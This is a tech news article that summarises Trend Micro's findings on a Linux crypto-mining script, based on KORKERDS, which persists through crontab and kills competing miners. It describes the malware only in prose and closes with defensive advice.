• A new malicious cryptocurrency mining script is hiding well in crontabs to plague Linux systems.
  • The new script is detecting and deleting quite a few of the known Linux miners, essentially cleaning the host for itself.
  • The basis for its code is KORKERDS, but it comes with subtle but crucial improvements compared to it.

Trend Micro researchers have discovered a new crypto-mining malware that deletes a large number of known Linux coin miners so that the host system resources are all available to itself. The script uses code from KORKERDS and Xbash, combining obfuscation and persistence traits. This new malware uses crontabs commands to download and execute more malicious code. Cron is a time-based task scheduler for Linux, so the script can run periodically without getting affected by system reboots, re-downloading the malware code in the case that it has been detected and deleted.

Compared to the KORKERDS code that has been used as a basis for this new malware, it does not uninstall any security products found in the infected system, and neither does it install a rootkit. Instead, these components are included in its kill list, so if the original KORKERDS is already in the system, it gets stopped. The cryptocurrency miner that is downloaded by the script is a custom version of XMR-Stak, one that supports a wide range of CPUs and GPUs, so the mining results are optimal. This new malware script does not only kill all other coin miners and malware, but it also spots relevant connections and services to specific IP addresses and suspends these as well.

The script inserts a single crontab to make the fetching and execution of the BASE64-encoded code possible. Instead, KORKERDS uses crontab more extensively and openly, so this new script sports a higher level of concealing in its operation, while the propagation is still based on the KORKERDS Python script. Although subtle, the differences between the KORKERDS and the new script are key in its operational routine efficiency and effectiveness. Removing all competing miners and malware are or at least stopping them may make this original script look like a better evil, but that doesn’t mean that the infected system will run any faster under its rule.

The best practice against this type of infections remains the multi-layered system setting so that when a malicious script finds its way into a farm, it can be isolated and contained to a group of systems at worst. Regularly checking crontab entries and monitoring the tasks that eat up system resources is another solid way to detect possible malware infections. For a full list of the indicators of compromise by this new crypto-mining malware, check the detailed Trend Micro security report.

Have you ever been infected by crypto-mining malware? Let us know of your experience in the comments section below, and don’t forget to like and subscribe on our socials on Facebook and Twitter, your portal to daily tech news.